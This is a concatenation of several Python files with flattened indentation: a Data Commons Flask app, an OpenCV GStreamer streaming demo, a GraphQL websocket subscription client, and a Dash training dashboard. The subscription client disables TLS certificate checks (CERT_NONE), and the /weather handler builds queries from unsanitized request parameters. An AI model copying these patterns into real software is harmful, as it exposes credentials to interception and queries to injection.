This module contains the request handler codes and the main app.
"""
import json
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from lib import translator
from __init__ import create_app
from cache import cache
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
app = create_app()
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['PRIVATE'] = app.config['PRIVATE']
app.jinja_env.globals['SUSTAINABILITY'] = app.config['SUSTAINABILITY']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = 'sustainability/base.html' if app.config[
'SUSTAINABILITY'] else 'base.html'
GCS_BUCKET = app.config['GCS_BUCKET']
_MAX_SEARCH_RESULTS = 1000
WARM_UP_ENDPOINTS = [
"/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
"/api/place/parent/country/USA",
"/api/place/places-in-names?dcid=country/USA&placeType=County",
"/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
logging.info("Sending warm up requests:")
for endpoint in WARM_UP_ENDPOINTS:
while True:
try:
resp = requests.get("http://127.0.0.1:8080" + endpoint)
if resp.status_code == 200:
break
except:
pass
time.sleep(1)
@app.before_request
def before_request():
scheme = request.headers.get('X-Forwarded-Proto')
if scheme and scheme == 'http' and request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return flask.redirect(url, code=code)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
# The route decorator must be outermost so the cached wrapper is what gets registered.
@app.route('/api/placeid2dcid/<path:placeid>')
@cache.cached(timeout=3600 * 24)
def api_placeid2dcid(placeid):
"""
API endpoint to get dcid based on place id.
This is to use together with the Google Maps Autocomplete API:
https://developers.google.com/places/web-service/autocomplete.
"""
if placeid in app.config['PLACEID2DCID']:
return app.config['PLACEID2DCID'][placeid]
else:
flask.abort(404, 'dcid not found for %s' % placeid)
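# Hypothetical example (the place id below is illustrative, not a known mapping):
#   GET /api/placeid2dcid/ChIJOwg_06VPwokRYv534QaPC8g -> returns the mapped DCID,
#   or responds 404 if the place id is not present in the PLACEID2DCID config.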
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
return flask.render_template('translator.html',
schema_mapping=translator.SCHEMA_MAPPING,
sample_query=translator.SAMPLE_QUERY)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search')
def search():
return flask.render_template('search.html')
@app.route('/healthz')
def healthz():
return "very healthy"
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search_dc')
def search_dc():
"""Add DC API powered search for non-place searches temporarily"""
query_text = request.args.get('q', '')
max_results = int(request.args.get('l', _MAX_SEARCH_RESULTS))
search_response = dc.search(query_text, max_results)
# Convert from search results to template dictionary.
results = []
query_tokens = set(query_text.lower().split())
for section in search_response.get('section', []):
entities = []
for search_entity in section['entity']:
entity = {}
entity['name'] = search_entity['name']
entity['dcid'] = search_entity['dcid']
name_tokens = search_entity['name'].lower().split()
for i, t in enumerate(name_tokens):
name_tokens[i] = t.strip("'")
name_tokens = set(name_tokens)
if not name_tokens & query_tokens:
continue
entity['rank'] = len(name_tokens & query_tokens) / len(name_tokens |
query_tokens)
entities.append(entity)
entities = sorted(entities, key=lambda e: (e['rank']), reverse=True)
if entities:
results.append({
'type': section['typeName'],
'entities': entities,
})
return flask.render_template('search_dc.html',
query_text=query_text,
results=results)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/weather')
def get_weather():
dcid = request.args.get('dcid')
prop = request.args.get('prop')
period = request.args.get('period')
if not dcid:
flask.abort(400, 'Missing url parameter "dcid"')
if not prop:
flask.abort(400, 'Missing url parameter "prop"')
if not period:
flask.abort(400, 'Missing url parameter "period"')
query_string = ('SELECT ?date ?mean ?unit ?provId '
'WHERE {{'
' ?o typeOf {period}WeatherObservation .'
' ?o observedNode {dcid} .'
' ?o measuredProperty {prop} .'
' ?o observationDate ?date .'
' ?o unit ?unit .'
' ?o meanValue ?mean .'
' ?o provenance ?provId .}}').format(period=period,
dcid=dcid,
prop=prop)
_, rows = dc.query(query_string)
observations = []
for row in rows:
if ('value' not in row['cells'][0] or 'value' not in row['cells'][1] or
'value' not in row['cells'][2]):
continue
date = row['cells'][0]['value']
if date < '2000':
continue
text = 'mean {}: {} {}'.format(prop, row['cells'][1]['value'],
row['cells'][2]['value'])
observations.append({
'measuredProperty': prop,
'observationDate': date,
'meanValue': row['cells'][1]['value'],
'unit': row['cells'][2]['value'],
'text': text,
'provId': row['cells'][3]['value'],
})
return json.dumps(observations)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
return flask.render_template('mcf_playground.html')
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
return flask.render_template('version.html',
website_hash=os.environ.get("WEBSITE_HASH"),
mixer_hash=os.environ.get("MIXER_HASH"),
bigtable=os.environ.get("BIG_TABLE"),
bigquery=os.environ.get("BIG_QUERY"))
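# Warm the local endpoint caches in a background thread so the first user-facing
# requests are fast; skipped for test and webdriver runs.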
if not (app.config["TEST"] or app.config["WEBDRIVER"]):
thread = threading.Thread(target=send_warmup_requests)
thread.start()
if __name__ == '__main__':
# This is used when running locally only. When deploying to GKE,
# a webserver process such as Gunicorn will serve the app.
logging.info("Run web server in local mode")
    port = int(sys.argv[1]) if len(sys.argv) >= 2 else 8080
app.run(host='127.0.0.1', port=port, debug=True)
|
videostream_example.py
|
import numpy as np
import cv2
from multiprocessing import Process
def send():
cap_send = cv2.VideoCapture('videotestsrc ! video/x-raw,framerate=20/1 ! videoscale ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
out_send = cv2.VideoWriter('appsrc ! videoconvert ! x264enc tune=zerolatency bitrate=500 speed-preset=superfast ! rtph264pay ! udpsink host=127.0.0.1 port=5000',cv2.CAP_GSTREAMER,0, 20, (320,240), True)
if not cap_send.isOpened() or not out_send.isOpened():
print('VideoCapture or VideoWriter not opened')
exit(0)
while True:
ret,frame = cap_send.read()
if not ret:
print('empty frame')
break
out_send.write(frame)
cv2.imshow('send', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
cap_send.release()
out_send.release()
def receive():
cap_receive = cv2.VideoCapture('udpsrc port=5000 caps = "application/x-rtp, media=(string)video, clock-rate=(int)90000, encoding-name=(string)H264, payload=(int)96" ! rtph264depay ! decodebin ! videoconvert ! appsink', cv2.CAP_GSTREAMER)
if not cap_receive.isOpened():
print('VideoCapture not opened')
exit(0)
while True:
ret,frame = cap_receive.read()
if not ret:
print('empty frame')
break
cv2.imshow('receive', frame)
if cv2.waitKey(1)&0xFF == ord('q'):
break
cap_receive.release()
if __name__ == '__main__':
print(cv2.getBuildInformation())
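    # Only the receiver pipeline runs by default; uncomment the `s` lines below to
    # also launch the GStreamer sender in its own process.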
# s = Process(target=send)
r = Process(target=receive)
# s.start()
r.start()
# s.join()
r.join()
cv2.destroyAllWindows()
|
subscription_client.py
|
#!/usr/bin/env python3
# Copyright (c) 2004-present Facebook All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import json
import logging
import queue
import ssl
import threading
import uuid
from base64 import b64encode
from types import TracebackType
from typing import Any, Callable, Dict, Optional, Type
import websocket
CallbackType = Callable[[str, Dict[str, Any]], None]
GQL_WS_SUBPROTOCOL = "graphql-ws"
# all the message types
GQL_CONNECTION_INIT = "connection_init"
GQL_START = "start"
GQL_STOP = "stop"
GQL_CONNECTION_TERMINATE = "connection_terminate"
GQL_CONNECTION_ERROR = "connection_error"
GQL_CONNECTION_ACK = "connection_ack"
GQL_DATA = "data"
GQL_ERROR = "error"
GQL_COMPLETE = "complete"
GQL_CONNECTION_KEEP_ALIVE = "ka"
logging.basicConfig()
class ConnectionException(Exception):
"""Exception thrown during connection errors to the GraphQL server"""
class InvalidPayloadException(Exception):
"""Exception thrown if payload recived from server is mal-formed or cannot be parsed"""
class SubscriptionClient:
def __init__(self, url: str, username: str, password: str) -> None:
self.ws_url: str = url
self._connection_init_done = False
# cache of the headers for a session
self._headers: Optional[Dict[str, str]] = None
# map of subscriber id to a callback function
self._subscriber_callbacks: Dict[str, CallbackType] = {}
# our general receive queue
self._queue: queue.Queue[Dict[str, Any]] = queue.Queue()
# map of queues for each subscriber
self._subscriber_queues: Dict[str, queue.Queue[Dict[str, Any]]] = {}
self._shutdown_receiver = False
self.connect(username, password)
def connect(self, username: str, password: str) -> None:
"""
Initializes a connection with the server.
"""
user_and_pass = b64encode(f"{username}:{password}".encode("utf-8")).decode(
"ascii"
)
header = {"Authorization": "Basic %s" % user_and_pass}
self._connection = websocket.create_connection(
self.ws_url,
subprotocols=[GQL_WS_SUBPROTOCOL],
header=header,
sslopt={"cert_reqs": ssl.CERT_NONE},
)
# start the receiver thread
        self._receiver_thread = threading.Thread(target=self._receiver_task)
        self._receiver_thread.start()
def __dump_queues(self) -> None:
logging.debug("[GQL_CLIENT] => Dump of all the internal queues")
dumps = list(map(lambda q: (q[0], q[1].queue), self._subscriber_queues.items()))
logging.debug(f"[GQL_CLIENT] => Operation queues: \n {dumps}")
# wait for any valid message, while ignoring GQL_CONNECTION_KEEP_ALIVE
def _receiver_task(self) -> None:
"""the receive function of the client. Which validates response from the
server and queues data"""
while not self._shutdown_receiver:
self.__dump_queues()
res = self._connection.recv()
try:
msg = json.loads(res)
except json.JSONDecodeError as err:
                logging.warning(
                    f"Ignoring. Server sent invalid JSON data: {res} \n {err}"
                )
                continue
# ignore messages which are GQL_CONNECTION_KEEP_ALIVE
if msg["type"] != GQL_CONNECTION_KEEP_ALIVE:
# check all GQL_DATA and GQL_COMPLETE should have 'id'.
# Otherwise, server is sending malformed responses, error out!
if msg["type"] in [GQL_DATA, GQL_COMPLETE] and "id" not in msg:
# TODO: main thread can't catch this exception; setup
# exception queues. but this scenario will only happen with
# servers having glaring holes in implementing the protocol
# correctly, which is rare. hence this is not very urgent
raise InvalidPayloadException(
f'Protocol Violation.\nExpected "id" in {msg}, but could not find.'
)
# if the message has an id, it is meant for a particular operation
if "id" in msg:
op_id = msg["id"]
# put it in the correct operation/subscriber queue
if op_id not in self._subscriber_queues:
self._subscriber_queues[op_id] = queue.Queue()
self._subscriber_queues[op_id].put(msg)
# if a callback fn exists with the id, call it
if op_id in self._subscriber_callbacks:
user_fn = self._subscriber_callbacks[op_id]
user_fn(op_id, msg)
# if it doesn't have an id, put in the global queue
else:
self._queue.put(msg)
def _insert_subscriber(self, op_id: str, callback_fn: CallbackType) -> None:
self._subscriber_callbacks[op_id] = callback_fn
def _remove_subscriber(self, op_id: str) -> None:
del self._subscriber_callbacks[op_id]
def _create_operation_queue(self, op_id: str) -> None:
self._subscriber_queues[op_id] = queue.Queue()
def _remove_operation_queue(self, op_id: str) -> None:
if op_id in self._subscriber_queues:
del self._subscriber_queues[op_id]
def _get_operation_result(self, op_id: str) -> Dict[str, Any]:
return self._subscriber_queues[op_id].get()
def _connection_init(self, headers: Optional[Dict[str, Any]] = None) -> None:
# if we have already initialized and the passed headers are same as
# prev headers, then do nothing and return
if self._connection_init_done and headers == self._headers:
return
self._headers = headers
# send the `connection_init` message with the payload
payload = {"type": GQL_CONNECTION_INIT, "payload": {"headers": headers}}
self._connection.send(json.dumps(payload))
res = self._queue.get()
if res["type"] == GQL_CONNECTION_ERROR:
err = res.get("payload", "unknown error")
raise ConnectionException(err)
if res["type"] == GQL_CONNECTION_ACK:
self._connection_init_done = True
return
err_msg = (
"Unknown message from server, this client did not understand. "
+ "Original message: "
+ res["type"]
)
raise ConnectionException(err_msg)
def _start(
self, payload: Dict[str, Any], callback: Optional[CallbackType] = None
) -> str:
"""pass a callback function only if this is a subscription"""
op_id = uuid.uuid4().hex
frame = {"id": op_id, "type": GQL_START, "payload": payload}
self._create_operation_queue(op_id)
if callback:
self._insert_subscriber(op_id, callback)
self._connection.send(json.dumps(frame))
return op_id
def _stop(self, op_id: str) -> None:
payload = {"id": op_id, "type": GQL_STOP}
self._connection.send(json.dumps(payload))
def query(
self,
query: str,
variables: Optional[Dict[str, Any]] = None,
headers: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
"""
Run a GraphQL query or mutation. The `query` argument is a GraphQL query
string. You can pass optional variables and headers.
PS: To run a subscription, see the `subscribe` method.
"""
self._connection_init(headers)
payload = {"headers": headers, "query": query, "variables": variables}
op_id = self._start(payload)
res = self._get_operation_result(op_id)
self._stop(op_id)
ack = self._get_operation_result(op_id)
if ack["type"] != GQL_COMPLETE:
logging.warning(f"Expected to receive complete, but received: {ack}")
self._remove_operation_queue(op_id)
return res
def subscribe(
self,
query: str,
variables: Optional[Dict[str, Any]] = None,
headers: Optional[Dict[str, Any]] = None,
callback: Optional[CallbackType] = None,
) -> str:
"""
Run a GraphQL subscription.
Parameters:
query (str): the GraphQL query string
callback (function): a callback function. This is mandatory.
            This callback function is called every time there is new data from the
            subscription.
variables (dict): (optional) GraphQL variables
headers (dict): (optional) a dictionary of headers for the session
Returns:
op_id (str): The operation id (a UUIDv4) for this subscription operation
"""
# sanity check that the user passed a valid function
        if not callback or not callable(callback):
raise TypeError(
"the argument `callback` is mandatory and it should be a function"
)
self._connection_init(headers)
payload = {"headers": headers, "query": query, "variables": variables}
op_id = self._start(payload, callback)
return op_id
def stop_subscribe(self, op_id: str) -> None:
"""
Stop a subscription. Takes an operation ID (`op_id`) and stops the
subscription.
"""
self._stop(op_id)
self._remove_subscriber(op_id)
self._remove_operation_queue(op_id)
def close(self) -> None:
"""
Close the connection with the server. To reconnect, use the `connect`
method.
"""
self._shutdown_receiver = True
self._connection.close()
        self._receiver_thread.join()
def __enter__(self) -> "SubscriptionClient":
"""enter method for context manager"""
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
exc_traceback: Optional[TracebackType],
) -> None:
"""exit method for context manager"""
self.close()
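# A minimal usage sketch of this client (not part of the original module). The
# endpoint URL, credentials and GraphQL documents below are illustrative
# placeholders, not values defined anywhere in this file.
if __name__ == "__main__":
    def print_event(op_id: str, message: Dict[str, Any]) -> None:
        # Called for every data frame pushed on the subscription.
        print(op_id, message)
    with SubscriptionClient("wss://example.invalid/graph/query", "user", "secret") as client:
        # One-shot query over the same websocket connection.
        print(client.query("query { me { id } }"))
        # Long-lived subscription; frames are delivered to print_event.
        op_id = client.subscribe("subscription { somethingChanged { id } }", callback=print_event)
        client.stop_subscribe(op_id)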
|
app_New.py
|
import base64
import datetime
import plotly
import plotly.figure_factory as ff
import os
import dash
import dash_bootstrap_components as dbc
import dash_daq as daq
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import json
import run_CL_new as run
import run_OD as run_OD
iterationList = []
lossList = []
epochOfLossList = []
epochOfTop1ErrorList = []
epochOfMeanAPList = []
TrainSet_top1_error_valueList = []
ValidationSet_top1_error_valueList = []
TrainSet_mean_ap_valueList = []
ValidationSet_mean_ap_valueList = []
metricList = []
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
image_filename = 'C:/Users/930415/PycharmProjects/chadle/dashUI/icon.png' # replace with your own image
encoded_image = base64.b64encode(open(image_filename, 'rb').read())
CLProjectNames = ','.join(run.CLProjectList)
ODProjectNames = ','.join(run.ODProjectList)
app.layout = html.Div([
html.Center(html.Img(src='data:image/png;base64,{}'.format(encoded_image.decode()), width='80', height='70')),
# Title
html.H1('CHaDLE ',
style={
"font": 'verdana',
'textAlign': 'center',
'color': 'Black'
}
),
# Tabs for CL and OD
html.Div([
dcc.Tabs(id='AllTab', value='AllTab', children=[
# Classification Tab
dcc.Tab(
label='Classification',
value='CLTab',
children=
[
html.Div([
html.Div(
[
# Main control panel - project name, device, pretrained model, buttons.
html.Div(
[
html.Th(children='Available Classification Projects: ' + CLProjectNames,
colSpan="1"),
html.Br(),
"Project Name:",
dcc.Input(
id='ProjectName_CL', value='Animals', type='text'
),
html.Br(),
"Training Device:", dcc.RadioItems(
id='Runtime_CL',
options=[{'label': i, 'value': i} for i in ['cpu', 'gpu']],
value='cpu',
labelStyle={'display': 'inline-block'}
),
"Pretrained Model:", dcc.Dropdown(
id='PretrainedModel_CL',
options=[{'label': i, 'value': i} for i in
["classifier_enhanced", "classifier_compact"]],
value='classifier_compact'
),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Button(id='operation_button_CL', n_clicks=0, children='Start Training'),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div([html.Br()]),
dcc.Loading(
id="loading-1",
type="default",
children=[html.Div(id="Training_loading_CL"),
html.Div(id="Evaluation_loading_CL")]
),
],
style={'width': '35%', 'float': 'left', 'display': 'inline-block'}
),
# Augmentation parameters panel
html.Div(
[
# Percentage of augmentation. Mandatory. 0% means not activated
html.Div(
[
# html.Label('Augmentation Percentage: '),
html.Label(id='AugmentationPercentage_CL',
style={'color': 'black',
'padding': '6px',
'font-family': 'Arial'
}
)
],
style={'display': 'inline'}
),
html.Div(
dcc.Slider(
id='AugmentationPercentage_CL_slider',
min=0,
max=100,
value=0,
marks={
0: {'label': '0%', },
25: {'label': '25%'},
50: {'label': '50%', 'style': {'color': '#77b0b1'}},
75: {'label': '75%'},
100: {'label': '100%'}
},
),
style={'width': '100%', 'float': 'left'},
),
# html.Label('Augmentation Percentage'),
# dcc.Input(id='AugmentationPercentage_CL', value='100', type='number', min=0, max=100, step=1, ),
html.Div([html.Br()]),
html.Div([html.Br()]),
# Rotation & Rotation Range checkbox and input.
# If not activated, placeholder will show 'disabled', same as following parameters.
dcc.Checklist(
id='Rotation_CL_Switch',
options=[
{
'label': 'Activate Rotation', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Rotation(Step of 90 degree)'),
dcc.Input(
id='Rotation_CL',
value='',
type='number',
min=-180, max=180,
step=90,
disabled=True,
placeholder="Disabled"
),
html.Label('Rotation Range(Step of 1)'),
dcc.Input(
id='RotationRange_CL',
value='',
type='number',
min=0,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Mirror checkbox and input
dcc.Checklist(
id='mirror_CL_Switch',
options=[
{
'label': 'Activate Mirror', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Mirror (off,c,r,rc)'),
dcc.Input(
id='mirror_CL',
value='',
type='text',
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Brightness Variation and Variation Spot checkbox and input
dcc.Checklist(
id='BrightnessVariation_CL_Switch',
options=[
{
'label': 'Activate Brightness Variation', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Brightness Variation'),
dcc.Input(
id='BrightnessVariation_CL',
value='',
type='number',
min=-100,
max=100,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Label('Brightness Variation Spot'),
dcc.Input(
id='BrightnessVariationSpot_CL',
value='',
type='number',
min=0,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Crop Percentage and Crop Pixel checkbox and input
dcc.Checklist(
id='Crop_CL_Switch',
options=[
{
'label': 'Activate Crop', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Crop Percentage'),
dcc.Input(
id='CropPercentage_CL',
value='',
type='number',
min=0,
max=100,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Label('Crop Pixel'),
dcc.Input(
id='CropPixel_CL',
value='',
type='number',
min=0,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Ignore Direction checkbox and input
dcc.Checklist(
id='Direction_CL_Switch',
options=[
{
'label': 'Ignore Direction', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Div([html.Br()]),
dcc.Checklist(
id='ClassID_CL_Switch',
options=[
{
'label': 'Class IDs No Orientation Exist', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Class IDs No Orientation'),
dcc.Input(
id='ClassIDsNoOrientation',
value='',
type='text',
disabled=True,
placeholder="Disabled"
),
# html.Label('Class IDs No Orientation'),
# dcc.Input(id='ClassIDsNoOrientation', value='[]', type='text'),
],
style={'width': '35%', 'display': 'inline-block'}
),
# Image and training detail parameters panel
html.Div(
[
html.Label('Image Width'),
                                dcc.Input(id='ImWidth_CL', value='100', type='number', min=0, step=1, ),
html.Label('Image Height'),
dcc.Input(id='ImHeight_CL', value='100', type='number', min=0, step=1, ),
html.Label('Image Channel'),
dcc.Input(id='ImChannel_CL', value='3', type='number', min=0, step=1, ),
html.Label('Batch Size'),
dcc.Input(id='BatchSize_CL', value='1', type='number', min=0, step=1, ),
html.Label('Initial Learning Rate'),
dcc.Input(id='InitialLearningRate_CL', value='0.001', type='number', min=0,
step=0.00001, ),
html.Label('Momentum'),
dcc.Input(id='Momentum_CL', value='0.09', type='number', min=0, step=0.00001, ),
html.Label('Number of Epochs'),
dcc.Input(id='NumEpochs_CL', value='2', type='number', min=0, step=1, ),
html.Label('Change Learning Rate @ Epochs'),
dcc.Input(id='ChangeLearningRateEpochs_CL', value='50,100', type='text'),
html.Label('Learning Rate Schedule'),
dcc.Input(id='lr_change_CL', value='0.01,0.05', type='text'),
html.Label('Regularisation Constant'),
dcc.Input(id='WeightPrior_CL', value='0.001', type='number', min=0,
step=0.00001, ),
html.Label('Class Penalty'),
dcc.Input(id='class_penalty_CL', value='0,0', type='text'),
],
style={'width': '30%', 'display': 'inline-block'}
),
html.Div([html.Br()]),
html.Div([html.Br()]),
],
style={'width': '45%', 'display': 'inline-block', 'float': 'left'}
),
# Graph Plotter
html.Div(
[
html.H4('Training Monitor',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Black'
}),
html.Div(id='metrics_CL',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Blue'
}),
dcc.Graph(id='iteration_loss_graph_CL'),
dcc.Graph(id='top1_error_graph_CL'),
dcc.Interval(
id='interval_graph_CL',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
],
style={'width': '55%', 'float': 'right'}
),
]),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div([html.Br()]),
# Evaluation
html.Div([
html.Div(
[
html.H4('Evaluation Graph', style={'float': 'center'}),
html.Button(id='evaluation_button_CL', n_clicks=0, children='Evaluation'),
],
style={'width': '75%', 'float': 'right'}
),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div(
[
html.Div(id='evaluation_text_CL'),
dcc.Graph(id='evaluation_graph_CL'),
],
style={'width': '60%', 'float': 'left', }
),
dcc.Interval(
id='interval-evaluation_CL',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
]),
html.Div(id='Operation_output_CL'),
html.Div(id='makeJson_CL'),
],
style={'display': 'inline-block'}
),
# Object Detection Tab
dcc.Tab(label='Object Detection', value='ODTab', children=[
# Basic inputs
html.Div([html.Th(children='Available Object Detection Projects: ' + ODProjectNames, colSpan="1"),
html.Br(),
"Project Name:",
dcc.Input(
id='ProjectName_OD', value='NTBW', type='text'
),
html.Br(),
"Training Device:", dcc.RadioItems(
id='Runtime_OD',
options=[{'label': i, 'value': i} for i in ['cpu', 'gpu']],
value='cpu',
labelStyle={'display': 'inline-block'}
),
"Pretrained Model:", dcc.Dropdown(
id='PretrainedModel_OD',
options=[{'label': i, 'value': i} for i in ["classifier_enhanced", "classifier_compact"]],
value='classifier_compact'
),
], style={'width': '15%', 'display': 'inline-block'}),
html.Br(),
html.Br(),
# Parameters inputs
html.Div([
html.Div([
html.Label('Number of Classes'),
dcc.Input(id='NumClasses_OD', value='5', type='number', min=0, step=1, ),
html.Label('Image Width'),
dcc.Input(id='ImWidth_OD', value='960', type='number', min=0, step=1, ),
html.Label('Image Height'),
dcc.Input(id='ImHeight_OD', value='1024', type='number', min=0, step=1, ),
html.Label('Image Channel'),
dcc.Input(id='ImChannel_OD', value='3', type='number', min=0, step=1, ),
html.Label('Capacity'),
dcc.Input(id='Capacity_OD', value='medium', type='text', min=0, step=1, ),
html.Label('Instance Type'),
dcc.Input(id='InstanceType_OD', value='rectangle1', type='text', min=0, step=1, ),
html.Label('Training Percent'),
dcc.Input(id='TrainingPercent_OD', value='75', type='number', min=0, step=1, ),
html.Label('Validation Percent'),
dcc.Input(id='ValidationPercent_OD', value='15', type='number', min=0, step=1, ),
],
style={'width': '15%', 'display': 'inline-block'}),
html.Div([
html.Label('Batch Size'),
dcc.Input(id='BatchSize_OD', value='10', type='number', min=0, step=1, ),
html.Label('Initial Learning Rate'),
dcc.Input(id='InitialLearningRate_OD', value='0.001', type='number', min=0, step=0.00001, ),
html.Label('Momentum'),
dcc.Input(id='Momentum_OD', value='0.09', type='number', min=0, step=0.00001, ),
html.Label('Number of Epochs'),
dcc.Input(id='NumEpochs_OD', value='2', type='number', min=0, step=1, ),
html.Label('Change Learning Rate @ Epochs'),
dcc.Input(id='ChangeLearningRateEpochs_OD', value='50,100', type='text'),
html.Label('Learning Rate Schedule'),
dcc.Input(id='lr_change_OD', value='0.01,0.05', type='text'),
html.Label('Regularisation Constant'),
dcc.Input(id='WeightPrior_OD', value='0.001', type='number', min=0, step=0.00001, ),
html.Label('Class Penalty'),
dcc.Input(id='class_penalty_OD', value='0,0', type='text'),
],
style={'width': '15%', 'display': 'inline-block'}),
html.Div([
html.Label('Augmentation Percentage'),
dcc.Input(id='AugmentationPercentage_OD', value='100', type='number', min=0, max=100, step=1, ),
html.Label('Rotation'),
dcc.Input(id='Rotation_OD', value='90', type='number', min=-180, max=180, step=90, ),
html.Label('Mirror (off,c,r,rc)'),
dcc.Input(id='mirror_OD', value='off', type='text', ),
html.Label('Brightness Variation'),
dcc.Input(id='BrightnessVariation_OD', value='0', type='number', min=-100, max=100, step=1, ),
html.Label('Brightness Variation Spot'),
dcc.Input(id='BrightnessVariationSpot_OD', value='0', type='number', min=-100, max=100,
step=1, ),
html.Label('Rotation Range (Step of 1)'),
dcc.Input(id='RotationRange_OD', value='10', type='number', min=1, step=1, ),
html.Label('Bbox heads weight'),
dcc.Input(id='BboxHeads_OD', value='', type='number', min=1, step=1, ),
html.Label('Class heads weight'),
dcc.Input(id='ClassHeads_OD', value='', type='number', min=1, step=1, ),
# html.Label('Ignore Direction'),
# dcc.Input(id='IgnoreDirection', value='false', type='text'),
# html.Label('Class IDs No Orientation Exist'),
# dcc.Input(id='ClassIDsNoOrientationExist', value='false', type='text'),
# html.Label('Class IDs No Orientation'),
# dcc.Input(id='ClassIDsNoOrientation', value='[]', type='text'),
],
style={'width': '15%', 'float': 'initial', 'display': 'inline-block',
}),
# Estimated Value show and input
html.Div([
html.H4('Halcon estimated values'),
html.P('Key in new desired value or leave it empty: '),
html.Br(),
html.Div([html.P('Min Level: '),
html.Div([html.Div(id='MinLevel_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='MinLevel_Input_OD', placeholder='Integer', type='number', min=0,
step=1,
debounce=True), ]),
html.Br(),
html.Div([html.P('Max Level: '),
html.Div([html.Div(id='MaxLevel_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='MaxLevel_Input_OD', placeholder='Integer', type='number', min=0,
step=1,
debounce=True), ]),
html.Br(),
html.Div([html.P('Anchor Number of Subscales: '),
html.Div([html.Div(id='AnchorNumSubscales_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='AnchorNumSubscales_Input_OD', placeholder='Integer', type='number',
min=0,
step=1,
debounce=True), ]),
html.Br(),
html.Div([html.P('Anchor Aspect Ratios (min,max,mean,deviation): '),
html.Div([html.Div(id='AnchorAspectRatios_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='AnchorAspectRatios_Input_OD',
placeholder='List (0.720, 1.475, 2.125, 2.753)',
type='text', min=0, debounce=True, style={'width': '50%', }), ]),
# if user wanna change, type in the desired value.
# value = Best value among 4 read by halcon
# label the value,
],
style={'width': '40%', 'float': 'right'},
),
]),
html.Br(),
html.Br(),
html.Br(),
dcc.Loading(
id="loading_OD",
type="default",
children=[html.Div(id="Training_loading_OD"),
html.Div(id="Estimate_values_loading_OD")]
),
html.Br(),
# Buttons
html.Div([
html.Button(id='estimate_button_OD', n_clicks=0, children='Halcon Estimate Values'),
html.Button(id='operation_button_OD', n_clicks=0, children='Train'),
# html.Button(id='parameters_out_button', n_clicks=0, children='Output Parameters'),
html.Button(id='evaluation_button_OD', n_clicks=0, children='Evaluation'), ],
style={'display': 'flex',
'justify-content': 'center',
'align-items': 'center',
'height': '100px',
}, ),
html.Div([html.Label(id='training_output_OD'), ], style={'display': 'flex',
'justify-content': 'center',
'align-items': 'center',
'height': '50px',
}, ),
# Evaluation Graph
html.Div([
html.Div([html.H2('Evaluation Graph Coming Soon...',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Black'
}),
html.Div(id='evaluation_text_OD'),
dcc.Graph(id='evaluation_graph_OD'),
],
style={'width': '100%', 'float': 'initial'}),
dcc.Interval(
id='interval-evaluation_OD',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
], ),
# OD training monitor graph plotter
html.Div([
html.H1('CHaDLE Training Monitor - Object Detection',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Black'
}),
html.Div(id='metrics_OD',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Blue'
}),
dcc.Graph(id='iteration_loss_graph_OD'),
dcc.Graph(id='mean_ap_graph_OD'),
dcc.Interval(
id='interval_graph_OD',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
])
]),
]),
]),
])
############################################################################################################
